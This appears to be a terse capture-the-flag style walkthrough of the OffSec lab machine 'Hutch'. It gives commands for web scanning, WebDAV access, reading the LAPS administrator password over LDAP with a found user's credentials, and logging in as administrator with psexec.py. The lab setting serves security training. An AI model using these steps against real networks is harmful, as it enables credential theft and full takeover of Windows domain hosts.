80

nikto -h http://192.168.192.122

Trying cadaver:

cadaver http://192.168.192.122/

Now to get the admin password

ldapsearch -x -H ldap://192.168.192.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

Now we can login with psexec:

psexec.py administrator@192.168.192.122

Last updated